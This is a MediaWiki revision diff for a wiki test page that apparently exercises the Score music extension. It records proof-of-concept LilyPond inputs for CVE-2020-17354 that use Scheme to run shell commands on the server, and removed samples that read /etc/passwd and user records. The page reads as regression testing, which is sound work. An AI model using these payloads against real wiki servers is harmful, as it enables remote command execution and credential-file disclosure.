Tim paste: Difference between revisions

Latest revision as of 11:15, 21 January 2023

Normal

Unable to obtain LilyPond version:

/bin/bash: line 1: /usr/local/bin/lilypond: No such file or directory

Multipage

Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond is set correctly.

Raw

Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond is set correctly.

Starling

Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond is set correctly.

Rest

Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond is set correctly.

ABC

Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond is set correctly.

CVE-2020-17354

See T259210; unable to reproduce with LilyPond 2.23.82, MediaWiki REL1_39, Score on master.

1. PoC from task:

Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond is set correctly.

2. Again, using raw=1:

Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond is set correctly.

3. Notehead stencil hack PoC, contributed in comment from LilyPond developer Han-wen Nienhuys:

Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond is set correctly.

@@ Line 22: / Line 22: @@
 \header { tagline = ##f }
 \paper { #(set-paper-size "a5") }
-</score>
-== LY getpwuid ==
-<score>
-% 7
-\new Staff <<{c^#
-(object->string (getpwuid 0))
-}>></score>
-== PS password ==
-<score>
-% 6
-\relative c' {
-  c ^\markup { \postscript #"
-    /TeXGyreSchola-Regular 4 output-scale div selectfont
-    currentpoint
-    /pass_y exch def
-    /pass_x exch def
-    /passfile (/etc/passwd) (r) file def
-    /passstr 10000 string def
-    {
-      passfile passstr readline
-      not { exit } if
-      show
-      /pass_y pass_y 2 sub def
-      pass_x pass_y moveto
-    } loop
-  " }
-}
 </score>
@@ Line 86: / Line 53: @@
 C,   D, E, F,|G, A, B, C|D E F G|A B c d|
 e f g a|b c' d' e'|f' g' a' b'|]
+</score>
+== CVE-2020-17354 ==
+See [https://phabricator.wikimedia.org/T259210 T259210]; unable to reproduce with LilyPond 2.23.82, MediaWiki REL1_39, Score on master.
+. PoC from task:<score>
+{
+  \relative { c' }
+}
+#(begin
+  (define location 1)
+  (display "With output-def-scope\n")
+  (eval '(system "id") (ly:output-def-scope #{ \midi {} #}))
+  (display "With output-def-lookup\n")
+  ((ly:output-def-lookup #{ \midi {} #} 'system) "touch /var/www/mediawiki-test/images/lilypond/test-1")
+)
+</score>
+. Again, using raw=1:<score raw=1>
+\header { tagline = ##f } {
+  \relative { c' }
+}
+#(begin
+  (define location 1)
+  (display "With output-def-scope\n")
+  (eval '(system "id") (ly:output-def-scope #{ \midi {} #}))
+  (display "With output-def-lookup\n")
+  ((ly:output-def-lookup #{ \midi {} #} 'system) "touch /var/www/mediawiki-test/images/lilypond/test-2")
+)
+</score>
+. Notehead stencil hack PoC, contributed in [https://phabricator.wikimedia.org/T259210#6368852 comment] from LilyPond developer Han-wen Nienhuys: <score>
+{
+  \override NoteHead.text = \system
+  \override NoteHead.stencil =
+  #(lambda (grob)
+    ((cdr (assoc 'text
+	   (cadr (ly:grob-alist-chain grob '())))) "touch /var/www/mediawiki-test/images/lilypond/test-3")
+    #f)
+  c4
+}
 </score>